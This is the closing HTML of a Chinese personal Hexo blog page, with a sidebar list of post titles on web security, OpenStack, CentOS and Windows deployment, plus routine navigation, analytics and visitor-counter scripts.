    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/02/02/web%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2/">web安全攻防</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/01/13/%E7%94%A8PHP%E7%8E%AF%E5%A2%83%E8%B0%83%E7%94%A8powershell%E5%BC%B9%E4%B8%AAshell/">用PHP环境调用powershell弹个shell</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/02/SNMP%E5%8D%8F%E8%AE%AE%E8%AE%A4%E7%9F%A5/">SNMP协议认知</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/03/Centos7-%E5%9F%BA%E7%A1%80%E8%BF%90%E7%BB%B4%E5%91%BD%E4%BB%A4/">Centos7 基础运维命令</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/01/openstack%E5%AE%9E%E4%BE%8B%E9%97%AE%E9%A2%98/">openstack实例问题</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/10/openstack-cinder%E5%8D%B7%E6%97%A0%E6%B3%95%E5%88%A0%E9%99%A4/">openstack cinder卷无法删除 </a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/27/Centos7-openstack%E6%9D%82%E9%A1%B9/">Centos-openstack杂项</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/24/KMS%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BA%E5%8F%8A%E4%BD%BF%E7%94%A8/">KMS服务器搭建及使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/12/%E9%80%9A%E8%BF%87Windows%E9%83%A8%E7%BD%B2%E6%9C%8D%E5%8A%A1%EF%BC%88WDS%EF%BC%89%E5%AE%9E%E7%8E%B0%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E6%89%B9%E9%87%8F%E5%AE%89%E8%A3%85%E5%92%8C%E5%AE%9A%E5%88%B6/">通过Windows部署服务实现批量部署操作系统</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/09/test/">hello world</a></li></ul>
    <script src="http://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        // $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#toc, .switch-btn, .switch-area").toggle();
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
                $(".switch-btn, .switch-area").fadeToggle(300);
            }
        })
    </script>




    <script>
        
    </script>

</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2020 breakonion
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a><a href="https://github.com/maochunguang" target="_blank">Blog</a> by tommy
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >极客到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    
<script src="http://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>


<script src="/js/main.js"></script>


    <script>
        $(document).ready(function() {
            var backgroundnum = 4;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>


<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'xxxxxx', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->



	<script>
	var _hmt = _hmt || [];
	(function() {
	  var hm = document.createElement("script");
	  hm.src = "//hm.baidu.com/hm.js?xxcxcxcsdsf";
	  var s = document.getElementsByTagName("script")[0]; 
	  s.parentNode.insertBefore(hm, s);
	})();
	</script>



<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(
            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>